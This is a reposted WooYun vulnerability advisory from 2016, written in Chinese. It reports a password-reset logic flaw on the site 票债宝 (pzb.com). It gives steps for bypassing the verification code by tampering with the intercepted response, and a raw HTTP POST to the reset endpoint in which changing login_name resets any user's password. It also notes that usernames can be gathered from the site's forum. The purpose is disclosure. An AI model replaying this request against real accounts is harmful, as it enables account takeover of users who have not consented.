票债宝设计逻辑缺陷导致任意用户密码重置

admin

140347
文章

117
评论

2017年3月29日19:19:17评论376 views字数 213阅读0分42秒阅读模式

摘要

2016-03-23：细节已通知厂商并且等待厂商处理中
2016-03-23：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-28：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-187969

漏洞标题：票债宝设计逻辑缺陷导致任意用户密码重置

漏洞作者：路人甲

提交时间： 2016-03-23 07:38

公开时间： 2016-03-28 07:40

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

https://www.pzb.com/view/html/user/forgetPassword.shtml

13333333333测试

输入任意验证码，抓包

修改成success

跳转至设置密码页面

设置新密码即可

提取该接口请求内容

code 区域

POST https://www.pzb.com/web/view/anon/new/resetPassword HTTP/1.1
 Host: www.pzb.com
 Connection: keep-alive
 Content-Length: 50
 Accept: application/json, text/javascript, */*; q=0.01
 Origin: https://www.pzb.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/json
 Referer: https://www.pzb.com/view/html/user/forgetPassword.shtml
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=B725CA0E88E4A6A6F2C8062540351F2A; uid=rBADClbxWsQw7zlOAwPlAg==; CNZZDATA1256380794=1425105793-1458658165-null%7C1458658165
 
 {"login_name":"13333333333","password":"123123qq"}

替换login_name 可重置任意用户，密码

例如

论坛可获得部分用户的登录名

https://www.pzb.com/bbs/html/

登陆

个人资料涉及用户敏感信息

漏洞证明：

如上

修复方案：

加强验证码

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-28 07:40

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-06 18:52 | 破童 ( 实习白帽子 | Rank:61 漏洞数:20 | Engout Security Team)

1

会玩

1# 回复此人

漏洞概要 关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-187969

漏洞标题： 票债宝设计逻辑缺陷导致任意用户密码重置

相关厂商： 票债宝

漏洞作者： 路人甲